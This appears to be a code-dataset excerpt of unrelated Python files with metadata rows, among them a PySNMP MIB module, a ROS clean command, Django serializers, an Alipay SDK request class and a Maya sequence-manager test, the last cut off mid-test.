systemProfile_IncCallDistrib = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 50), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("firstAvailable", 2), ("fairShare", 3)))).setLabel("systemProfile-IncCallDistrib").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IncCallDistrib.setStatus('mandatory')
systemProfile_IgnoreLineup = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 51), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no", 1), ("yes", 2)))).setLabel("systemProfile-IgnoreLineup").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_IgnoreLineup.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile1 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 53), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile1").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile1.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile2 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 54), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile2").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile2.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile3 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 55), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile3").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile3.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile4 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 56), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile4").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile4.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile5 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 57), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile5").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile5.setStatus('mandatory')
systemProfile_JamFileComponents_JamFile6 = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 58), DisplayString()).setLabel("systemProfile-JamFileComponents-JamFile6").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_JamFileComponents_JamFile6.setStatus('mandatory')
systemProfile_Action_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 1, 1, 52), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("noAction", 1), ("createProfile", 2), ("deleteProfile", 3)))).setLabel("systemProfile-Action-o").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_Action_o.setStatus('mandatory')
mibsystemProfile_StatusNumberTable = MibTable((1, 3, 6, 1, 4, 1, 529, 23, 125, 2), ).setLabel("mibsystemProfile-StatusNumberTable")
if mibBuilder.loadTexts: mibsystemProfile_StatusNumberTable.setStatus('mandatory')
mibsystemProfile_StatusNumberEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1), ).setLabel("mibsystemProfile-StatusNumberEntry").setIndexNames((0, "ASCEND-MIBSYS1-MIB", "systemProfile-StatusNumber-Index-o"), (0, "ASCEND-MIBSYS1-MIB", "systemProfile-StatusNumber-Index1-o"))
if mibBuilder.loadTexts: mibsystemProfile_StatusNumberEntry.setStatus('mandatory')
systemProfile_StatusNumber_Index_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 1), Integer32()).setLabel("systemProfile-StatusNumber-Index-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_StatusNumber_Index_o.setStatus('mandatory')
systemProfile_StatusNumber_Index1_o = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 2), Integer32()).setLabel("systemProfile-StatusNumber-Index1-o").setMaxAccess("readonly")
if mibBuilder.loadTexts: systemProfile_StatusNumber_Index1_o.setStatus('mandatory')
systemProfile_StatusNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 23, 125, 2, 1, 3), DisplayString()).setLabel("systemProfile-StatusNumber").setMaxAccess("readwrite")
if mibBuilder.loadTexts: systemProfile_StatusNumber.setStatus('mandatory')
mibBuilder.exportSymbols("ASCEND-MIBSYS1-MIB", systemProfile_CallRoutingSortMethod=systemProfile_CallRoutingSortMethod, systemProfile_MasterShelfController=systemProfile_MasterShelfController, systemProfile_PotsDigitTimeout=systemProfile_PotsDigitTimeout, systemProfile_JamFileComponents_JamFile6=systemProfile_JamFileComponents_JamFile6, systemProfile_Index_o=systemProfile_Index_o, systemProfile_MaxDialoutTime=systemProfile_MaxDialoutTime, mibsystemProfileEntry=mibsystemProfileEntry, systemProfile_SessionidBase=systemProfile_SessionidBase, systemProfile_ExactMatchCallRouting=systemProfile_ExactMatchCallRouting, systemProfile_CallByCall=systemProfile_CallByCall, systemProfile_AutoLogout=systemProfile_AutoLogout, DisplayString=DisplayString, systemProfile_UserstatFormat=systemProfile_UserstatFormat, systemProfile_IdleLogout=systemProfile_IdleLogout, systemProfile_EditNumber=systemProfile_EditNumber, systemProfile_P50SwitchUsage=systemProfile_P50SwitchUsage, systemProfile_DigitalCallRoutingSortMethod=systemProfile_DigitalCallRoutingSortMethod, systemProfile_JamFileComponents_JamFile1=systemProfile_JamFileComponents_JamFile1, systemProfile_IncCallDistrib=systemProfile_IncCallDistrib, mibsystemProfile_StatusNumberTable=mibsystemProfile_StatusNumberTable, systemProfile_ParallelDialing=systemProfile_ParallelDialing, systemProfile_SystemRmtMgmt=systemProfile_SystemRmtMgmt, systemProfile_AnalogEncoding=systemProfile_AnalogEncoding, systemProfile_ControlBusType=systemProfile_ControlBusType, systemProfile_Name=systemProfile_Name, systemProfile_IgnoreLineup=systemProfile_IgnoreLineup, systemProfile_JamFileComponents_JamFile2=systemProfile_JamFileComponents_JamFile2, systemProfile_Console=systemProfile_Console, systemProfile_SubAddressMode=systemProfile_SubAddressMode, systemProfile_NumDigitsTrunkGroups=systemProfile_NumDigitsTrunkGroups, systemProfile_Contact=systemProfile_Contact, systemProfile_ModemPriNumberingPlanId=systemProfile_ModemPriNumberingPlanId, systemProfile_BootSrVersion=systemProfile_BootSrVersion, systemProfile_DmSubaddress=systemProfile_DmSubaddress, systemProfile_V110Subaddress=systemProfile_V110Subaddress, mibsystemProfileTable=mibsystemProfileTable, systemProfile_Location=systemProfile_Location, systemProfile_oDS0MinRst=systemProfile_oDS0MinRst, systemProfile_JamFileComponents_JamFile3=systemProfile_JamFileComponents_JamFile3, systemProfile_StatusNumber=systemProfile_StatusNumber, systemProfile_UseTrunkGroups=systemProfile_UseTrunkGroups, systemProfile_TermRate=systemProfile_TermRate, mibsystemProfile=mibsystemProfile, mibsystemProfile_StatusNumberEntry=mibsystemProfile_StatusNumberEntry, systemProfile_ShelfControllerType=systemProfile_ShelfControllerType, systemProfile_WanInterface=systemProfile_WanInterface, systemProfile_PermConnUpdMode=systemProfile_PermConnUpdMode, systemProfile_NasPortFormat=systemProfile_NasPortFormat, systemProfile_ModemPriTypeOfNumber=systemProfile_ModemPriTypeOfNumber, systemProfile_SupportDbcs=systemProfile_SupportDbcs, systemProfile_DelayDualPortDialing=systemProfile_DelayDualPortDialing, systemProfile_TOnline=systemProfile_TOnline, systemProfile_SerialSubaddress=systemProfile_SerialSubaddress, systemProfile_JamFileComponents_JamFile5=systemProfile_JamFileComponents_JamFile5, systemProfile_T302Timer=systemProfile_T302Timer, systemProfile_LanSubaddress=systemProfile_LanSubaddress, systemProfile_SingleFileIncoming=systemProfile_SingleFileIncoming, systemProfile_NewNasPortIdFormat=systemProfile_NewNasPortIdFormat, systemProfile_Country=systemProfile_Country, systemProfile_SysModemProfile_oATAnswerString=systemProfile_SysModemProfile_oATAnswerString, systemProfile_System8kClock=systemProfile_System8kClock, systemProfile_Action_o=systemProfile_Action_o, systemProfile_MaxSystemDS0Mins=systemProfile_MaxSystemDS0Mins, systemProfile_JamFileComponents_JamFile4=systemProfile_JamFileComponents_JamFile4, systemProfile_ConsoleSecurity=systemProfile_ConsoleSecurity, systemProfile_TOnlineMostAvailChan=systemProfile_TOnlineMostAvailChan, systemProfile_StatusNumber_Index_o=systemProfile_StatusNumber_Index_o, systemProfile_StatusNumber_Index1_o=systemProfile_StatusNumber_Index1_o)
| pysnmp/ASCEND-MIBSYS1-MIB.py | 26,681 | PySNMP MIB module ASCEND-MIBSYS1-MIB (http://snmplabs.com/pysmi) ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASCEND-MIBSYS1-MIB Produced by pysmi-0.3.4 at Mon Apr 29 17:12:34 2019 On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) | 330 | en | 0.311998 |
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
from .workspace import get_workspace_location, get_workspace_state, resolve_this, find_ros_root
from .config import Config
from .cache import Cache
from .ui import msg, warning, fatal, show_conflicts
from .util import call_process, PIPE
from .resolver import find_dependees
import os
try:
from os import scandir
except ImportError:
from scandir import scandir
def run(args):
wsdir = get_workspace_location(args.workspace)
config = Config(wsdir)
cache = Cache(wsdir)
ros_rootdir = find_ros_root(config.get("ros_root", None))
if ros_rootdir is None:
fatal("cannot detect ROS distribution. Have you sourced your setup.bash?\n")
if args.this:
if args.offline is None:
args.offline = config.get("offline_mode", False)
if args.offline:
warning("offline mode. Run 'rosrepo config --online' to disable\n")
ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
args.packages = resolve_this(wsdir, ws_state)
elif args.vanished or args.unused:
if args.offline is None:
args.offline = config.get("offline_mode", False)
if args.offline:
warning("offline mode. Run 'rosrepo config --online' to disable\n")
ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
args.packages = []
for d in scandir(os.path.join(wsdir, "build")):
if d.is_dir() and d.name not in ws_state.ws_packages and not d.name == "catkin_tools_prebuild":
args.packages.append(d.name)
if args.unused:
depends, _, conflicts = find_dependees(config["pinned_build"] + config["default_build"], ws_state, ignore_missing=True)
show_conflicts(conflicts)
if conflicts:
fatal("cannot resolve dependencies\n")
unused_packages = set(ws_state.ws_packages) - set(depends.keys())
args.packages += [p for p in unused_packages if os.path.isdir(os.path.join(wsdir, "build", p))]
if not args.packages:
msg("Nothing to clean\n")
return 0
if not args.dry_run:
invoke = ["catkin", "config", "--extend", ros_rootdir]
call_process(invoke, stdout=PIPE, stderr=PIPE)
config["last_ros_root"] = ros_rootdir
config.write()
catkin_clean = ["catkin", "clean", "--workspace", wsdir, "--yes"]
if args.dry_run:
catkin_clean.append("--dry-run")
catkin_clean += args.packages or ["--all"]
return call_process(catkin_clean)
| src/rosrepo/cmd_clean.py | 3,278 | coding=utf-8 ROSREPO Manage ROS workspaces with multiple Gitlab repositories Author: Timo Röhling Copyright 2016 Fraunhofer FKIE Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 650 | en | 0.83555 |
from rpython.jit.backend.llsupport.test.ztranslation_test import TranslationRemoveTypePtrTest
from rpython.translator.translator import TranslationContext
from rpython.config.translationoption import DEFL_GC
from rpython.jit.backend.arm.test.support import skip_unless_run_slow_tests
skip_unless_run_slow_tests()
class TestTranslationRemoveTypePtrARM(TranslationRemoveTypePtrTest):
def _get_TranslationContext(self):
t = TranslationContext()
t.config.translation.gc = DEFL_GC # 'hybrid' or 'minimark'
t.config.translation.gcrootfinder = 'shadowstack'
t.config.translation.list_comprehension_operations = True
t.config.translation.gcremovetypeptr = True
return t | rpython/jit/backend/arm/test/test_ztranslation_external_exception.py | 717 | 'hybrid' or 'minimark' | 22 | fa | 0.173635 |
from data import *
# data augmentation
#In deep learning tasks, a lot of data is need to train DNN model, when the dataset is not big enough, data augmentation should be applied.
#keras.preprocessing.image.ImageDataGenerator is a data generator, which can feed the DNN with data like : (data,label), it can also do data augmentation at the same time.
#It is very convenient for us to use keras.preprocessing.image.ImageDataGenerator to do data augmentation by implement image rotation, shift, rescale and so on... see [keras documentation](https://keras.io/preprocessing/image/) for detail.
#For image segmentation tasks, the image and mask must be transformed **together!!**
## define your data generator
# If you want to visualize your data augmentation result, set save_to_dir = your path
#if you don't want to do data augmentation, set data_gen_args as an empty dict.
#data_gen_args = dict()
data_gen_args = dict(rotation_range=0.2,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.05,
zoom_range=0.05,
horizontal_flip=True,
fill_mode='nearest')
myGenerator = trainGenerator(20, '/data/s2732815/unet/data/train', 'image', 'label',
data_gen_args, save_to_dir = '/data/s2732815/unet/data/train/aug')
## visualize your data augmentation result
#you will see 60 transformed images and their masks in data/membrane/train/aug
num_batch = 3
for i,batch in enumerate(myGenerator):
if(i >= num_batch):
break
## create .npy data
# If your computer has enough memory, you can create npy files containing all your images and masks, and feed your DNN with them.
# image_arr, mask_arr = geneTrainNpy("data/membrane/train/aug/", "data/membrane/train/aug/")
# np.save("data/image_arr.npy",image_arr)
# np.save("data/mask_arr.npy",mask_arr)
| dataPrepare.py | 1,917 | data augmentationIn deep learning tasks, a lot of data is need to train DNN model, when the dataset is not big enough, data augmentation should be applied.keras.preprocessing.image.ImageDataGenerator is a data generator, which can feed the DNN with data like : (data,label), it can also do data augmentation at the same time.It is very convenient for us to use keras.preprocessing.image.ImageDataGenerator to do data augmentation by implement image rotation, shift, rescale and so on... see [keras documentation](https://keras.io/preprocessing/image/) for detail.For image segmentation tasks, the image and mask must be transformed **together!!** define your data generator If you want to visualize your data augmentation result, set save_to_dir = your pathif you don't want to do data augmentation, set data_gen_args as an empty dict.data_gen_args = dict() visualize your data augmentation resultyou will see 60 transformed images and their masks in data/membrane/train/aug create .npy data If your computer has enough memory, you can create npy files containing all your images and masks, and feed your DNN with them. image_arr, mask_arr = geneTrainNpy("data/membrane/train/aug/", "data/membrane/train/aug/") np.save("data/image_arr.npy",image_arr) np.save("data/mask_arr.npy",mask_arr) | 1,288 | en | 0.714759 |
from copy import deepcopy
from simple_api.django_object.actions import DetailAction, ListAction, CreateAction, UpdateAction, DeleteAction
from simple_api.django_object.datatypes import create_associated_list_type
from simple_api.django_object.filters import generate_filters
from simple_api.django_object.converter import determine_simple_api_fields
from simple_api.django_object.utils import get_pk_field
from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
base_class = "simple_api.django_object.django_object.DjangoObject"
def __new__(mcs, name, bases, attrs, **kwargs):
cls = super().__new__(mcs, name, bases, attrs)
if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
return cls
object_stub = ClassStub(name=cls.__name__, bases=(Object,))
# set the module of the generated Object class to match the module of the user class
object_stub.add_attr("__module__", cls.__module__)
assert cls.model is not None, "`model` must be set."
# if the class is meant to resolve relations, store it for the particular model
if cls.class_for_related:
model_django_object_storage.store(cls.model, cls)
cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
object_stub.add_attr("pk_field", cls.pk_field_name)
# make sure the primary key is included, otherwise `ModelObjectAction`s would just not work
if cls.only_fields and cls.pk_field_name not in cls.only_fields:
cls.only_fields = cls.only_fields + (cls.pk_field_name,)
elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
cls.exclude_fields = (f for f in cls.exclude_fields if f != cls.pk_field_name)
fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
cls.model,
cls.only_fields, cls.exclude_fields,
cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
)
for f in input_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.in_fields = {**fields, **input_fields}
for f in output_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.out_fields = {**fields, **output_fields}
object_stub.add_attr("fields", fields)
object_stub.add_attr("input_fields", input_fields)
object_stub.add_attr("output_fields", output_fields)
# create filters and List type for potential listing actions
cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
object_stub.add_attr("filter_type", cls.filter_type)
create_associated_list_type(cls)
actions = {}
if cls.detail_action is not None:
actions["detail"] = deepcopy(cls.detail_action)
if cls.list_action is not None:
actions["list"] = deepcopy(cls.list_action)
if cls.create_action is not None:
actions["create"] = deepcopy(cls.create_action)
if cls.update_action is not None:
actions["update"] = deepcopy(cls.update_action)
if cls.delete_action is not None:
actions["delete"] = deepcopy(cls.delete_action)
actions.update(cls.custom_actions)
converted_actions = {}
for action_name, action in actions.items():
action.set_parent_class(cls)
action.set_name(action_name)
converted_actions[action_name] = action.to_action()
object_stub.add_attr("actions", converted_actions)
if cls.field_difficulty_scores is not None:
object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
cls._object = object_stub.build(ObjectMeta)
return cls
class DjangoObject(metaclass=DjangoObjectMeta):
model = None
auto_pk = True
class_for_related = True
only_fields = None
exclude_fields = None
custom_fields = {}
input_custom_fields = {}
output_custom_fields = {}
field_difficulty_scores = {}
detail_action = DetailAction()
list_action = ListAction()
create_action = CreateAction()
update_action = UpdateAction()
delete_action = DeleteAction()
custom_actions = {}
@classmethod
def to_object(cls):
return cls._object
| simple_api/django_object/django_object.py | 4,643 | set the module of the generated Object class to match the module of the user class if the class is meant to resolve relations, store it for the particular model make sure the primary key is included, otherwise `ModelObjectAction`s would just not work create filters and List type for potential listing actions | 309 | en | 0.86762 |
""" A class that can provide a date/time in any timeformat.format() format and both
local and UTC timezones within a ContextVariable.
Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
If you make any bug fixes or feature enhancements please let me know!
"""
import re, time, math, string
import timeformat
from simpletal import simpleTALES
PATHREGEX = re.compile ('^((?:local)|(?:utc))/?(.*)$')
class Date (simpleTALES.ContextVariable):
""" Wraps a DateTime and provides context paths local and utc.
These paths in turn can take TimeFormat formats, for example:
utc/%d-%m-%Y
"""
def __init__ (self, value = None, defaultFormat = '%a[SHORT], %d %b[SHORT] %Y %H:%M:%S %Z'):
""" The value should be in the LOCAL timezone.
"""
self.ourValue = value
self.defaultFormat = defaultFormat
def value (self, currentPath=None):
# Default to local timezone and RFC822 format
utcTime = 0
strFrmt = self.defaultFormat
if (currentPath is not None):
index, paths = currentPath
currentPath = '/'.join (paths[index:])
match = PATHREGEX.match (currentPath)
if (match is not None):
type = match.group(1)
if (type == 'local'):
utcTime = 0
else:
utcTime = 1
strFrmt = match.group(2)
if (strFrmt == ""):
strFrmt = self.defaultFormat
if (self.ourValue is None):
# Default to the current time!
timeValue = time.localtime()
else:
timeValue = self.ourValue
if (utcTime):
# Convert to UTC (GMT)
timeValue = time.gmtime (time.mktime (timeValue))
value = timeformat.format (strFrmt, timeValue, utctime=utcTime)
raise simpleTALES.ContextVariable (value)
| lib/pubtal/DateContext.py | 3,035 | Wraps a DateTime and provides context paths local and utc.
These paths in turn can take TimeFormat formats, for example:
utc/%d-%m-%Y
The value should be in the LOCAL timezone.
A class that can provide a date/time in any timeformat.format() format and both
local and UTC timezones within a ContextVariable.
Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
If you make any bug fixes or feature enhancements please let me know!
Default to local timezone and RFC822 format Default to the current time! Convert to UTC (GMT) | 1,934 | en | 0.856991 |
import pandas as pd
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d
base = pd.read_csv('orchard.csv')
figura = plt.figure()
eixo = figura.add_subplot(1, 1, 1, projection = '3d')
eixo.scatter(base.decrease, base.rowpos, base.colpos)
eixo.set_xlabel('decrease')
eixo.set_ylabel('rowpos')
eixo.set_zlabel('colpos')
# cores
# https://pythonspot.com/3d-scatterplot/ | Python/grafico_3d.py | 387 | cores https://pythonspot.com/3d-scatterplot/ | 44 | en | 0.633602 |
from rest_framework import serializers
from core.models import Tag, Ingredient, Recipe
class TagSerializer(serializers.ModelSerializer):
"""Seraizlizer for TAG object"""
class Meta:
model = Tag
fields = ('id', 'name')
read_only_fields = ('id',)
class IngredientSerializer(serializers.ModelSerializer):
"""Seraializer for Ingredient object"""
class Meta:
model = Ingredient
fields = ('id', 'name')
read_only_fields = ('id',)
class RecipeSerializer(serializers.ModelSerializer):
"""Recipe serailizer"""
ingredients = serializers.PrimaryKeyRelatedField(
many=True,
queryset=Ingredient.objects.all()
)
tags = serializers.PrimaryKeyRelatedField(
many=True,
queryset=Tag.objects.all()
)
class Meta:
model = Recipe
fields = ('id', 'title', 'ingredients', 'tags',
'time_minutes', 'price', 'link')
read_only_fields = ('id',)
class RecipeDetailSerializer(RecipeSerializer):
"""Serializer a recipe detail"""
ingredients = IngredientSerializer(many=True, read_only=True)
tags = TagSerializer(many=True, read_only=True)
class RecipeImageSerializer(serializers.ModelSerializer):
"""Serializer for uploading images to recipes"""
class Meta:
model = Recipe
fields = ('id', 'image')
read_only_fields = ('id',)
| app/recipe/serializers.py | 1,468 | Seraializer for Ingredient object
Serializer a recipe detail
Serializer for uploading images to recipes
Recipe serailizer
Seraizlizer for TAG object | 148 | en | 0.681499 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayEbppInvoiceApplyStatusNotifyModel import AlipayEbppInvoiceApplyStatusNotifyModel
class AlipayEbppInvoiceApplyStatusNotifyRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayEbppInvoiceApplyStatusNotifyModel):
self._biz_content = value
else:
self._biz_content = AlipayEbppInvoiceApplyStatusNotifyModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.ebpp.invoice.apply.status.notify'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| alipay/aop/api/request/AlipayEbppInvoiceApplyStatusNotifyRequest.py | 4,004 | !/usr/bin/env python -*- coding: utf-8 -*- | 42 | en | 0.34282 |
# -*- coding: utf-8 -*-
import unittest
import os
# prepare for test
os.environ['ANIMA_TEST_SETUP'] = ""
from anima.env import mayaEnv # to setup maya extensions
import pymel.core
from anima.edit import Sequence, Media, Video, Track, Clip, File
class SequenceManagerTestCase(unittest.TestCase):
"""tests the SequenceManagerExtension class
"""
def setUp(self):
"""set up the test
"""
# create a new scene and get the sequenceManager in the scene
pymel.core.newFile(force=True)
self.sm = pymel.core.PyNode('sequenceManager1')
def test_from_xml_path_argument_skipped(self):
"""testing if a TypeError will be raised when the path argument is
skipped
"""
sm = pymel.core.PyNode('sequenceManager1')
with self.assertRaises(TypeError) as cm:
sm.from_xml()
self.assertEqual(
cm.exception.message,
'from_xml() takes exactly 2 arguments (1 given)'
)
def test_from_xml_path_argument_is_not_a_string(self):
"""testing if a TypeError will be raised when the path argument is not
a string
"""
sm = pymel.core.PyNode('sequenceManager1')
with self.assertRaises(TypeError) as cm:
sm.from_xml(30)
self.assertEqual(
cm.exception.message,
'path argument in SequenceManager.from_xml should be a string, '
'not int'
)
def test_from_xml_path_argument_is_not_a_valid_path(self):
"""testing if a IOError will be raised when the path argument is not
a valid path
"""
sm = pymel.core.PyNode('sequenceManager1')
with self.assertRaises(IOError) as cm:
sm.from_xml('not a valid path')
self.assertEqual(
cm.exception.message,
'Please supply a valid path to an XML file!'
)
def test_from_xml_generates_correct_sequencer_hierarchy(self):
"""testing if from_xml method will generate Sequences and shots
correctly
"""
path = os.path.abspath('./test_data/test_v001.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.from_xml(path)
sequences = sm.sequences.get()
self.assertEqual(len(sequences), 1)
sequencer = sequences[0]
self.assertIsInstance(sequencer, pymel.core.nt.Sequencer)
self.assertEqual(sequencer.duration, 111)
self.assertEqual(sequencer.sequence_name.get(), 'SEQ001_HSNI_003')
# check scene fps
self.assertEqual(pymel.core.currentUnit(q=1, t=1), 'film')
# check timecode
time = pymel.core.PyNode('time1')
self.assertEqual(time.timecodeProductionStart.get(), 0.0)
shots = sequencer.shots.get()
